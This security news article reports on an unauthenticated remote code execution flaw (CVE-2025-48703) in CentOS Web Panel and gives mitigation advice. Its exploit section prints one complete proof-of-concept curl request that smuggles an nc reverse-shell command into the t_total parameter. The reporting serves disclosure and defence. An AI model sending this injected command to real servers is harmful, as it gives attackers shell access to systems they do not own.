CentOS Web Panel Vulnerability Allows Remote Code Execution – PoC Released

CentOS Web Panel Vulnerability Allows Remote Code Execution – PoC Released

A critical security vulnerability has been discovered in CentOS Web Panel (CWP), a widely used web hosting management solution.

The flaw, tracked as CVE-2025-48703, allows unauthenticated attackers to execute arbitrary commands on affected systems, potentially leading to full server compromise.

A proof-of-concept (PoC) exploit demonstrating remote code execution (RCE) has been publicly released, raising concerns for administrators of CWP-powered servers worldwide.

– Advertisement –

Vulnerability Details

CentOS Web Panel is a popular free and open-source control panel designed to simplify server management for CentOS, AlmaLinux, Rocky Linux, and other RPM-based distributions.

The panel provides a graphical interface for managing web servers, databases, email, and security features, making it a cost-effective alternative to commercial solutions like cPanel. 

CVE ID Affected Versions Impact
CVE-2025-48703 0.9.8.1188, 0.9.8.1204 Unauthenticated Remote Code Exec

The vulnerability affects versions 0.9.8.1188 and 0.9.8.1204, and possibly others, as reported by security researchers and confirmed by the release of a PoC exploit.

The exploit takes advantage of two key issues. First, the authentication mechanism in the user interface is improperly enforced, allowing requests to be processed without valid user credentials.

CentOS Web Panel Vulnerability Allows Remote Code Execution – PoC Released
CentOS Web Panel Vulnerability Allows Remote Code Execution – PoC Released 4

Second, a command injection vulnerability exists in the t_total parameter, which is used to set file permissions via the chmod command.

By crafting a malicious request, an attacker can bypass authentication and inject arbitrary commands, resulting in remote code execution.

Exploit and Impact

CentOS Web Panel Vulnerability Allows Remote Code Execution – PoC Released
CentOS Web Panel Vulnerability Allows Remote Code Execution – PoC Released 5

The PoC exploit demonstrates how an attacker can send a specially crafted HTTP POST request to the file manager endpoint, using the t_total parameter to inject a command. For example, an attacker can execute:

curl -kis ‘https://127.0.0.1:52083/myuser/index.php?module=filemanager&acc=changePerm’ –data ‘fileName=.bashrc&currentPath=/home/myuser&t_total=`nc 1.2.3.4 9999 -e /bin/bash`’

This command instructs the server to connect back to the attacker’s machine, granting them a remote shell. 

The exploit requires knowledge of a valid non-root username, which is often easy to obtain or guess on public-facing systems.

Mitigation and Response

The vulnerability has been assigned CVE-2025-48703 and was reported to the CWP developers in May 2025.

Administrators are urged to upgrade to the latest version of CentOS Web Panel or apply available patches immediately.

The use of firewalls, intrusion detection systems, and strict access controls is also recommended to mitigate potential attacks.

This is not the first time CentOS Web Panel has been targeted by remote code execution vulnerabilities.

Previous issues, such as CVE-2022-44877 and CVE-2022-25046, have allowed attackers to execute code with root privileges, highlighting the importance of prompt updates and vigilant monitoring.

The discovery of CVE-2025-48703 and the public release of a working exploit underscore the ongoing risks associated with web-based server management panels.

Organizations using CentOS Web Panel should prioritize security updates and monitor for suspicious activity to prevent potential compromise. 

The security community continues to urge vendors and administrators to adopt proactive measures in response to emerging threats.

Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates


Source link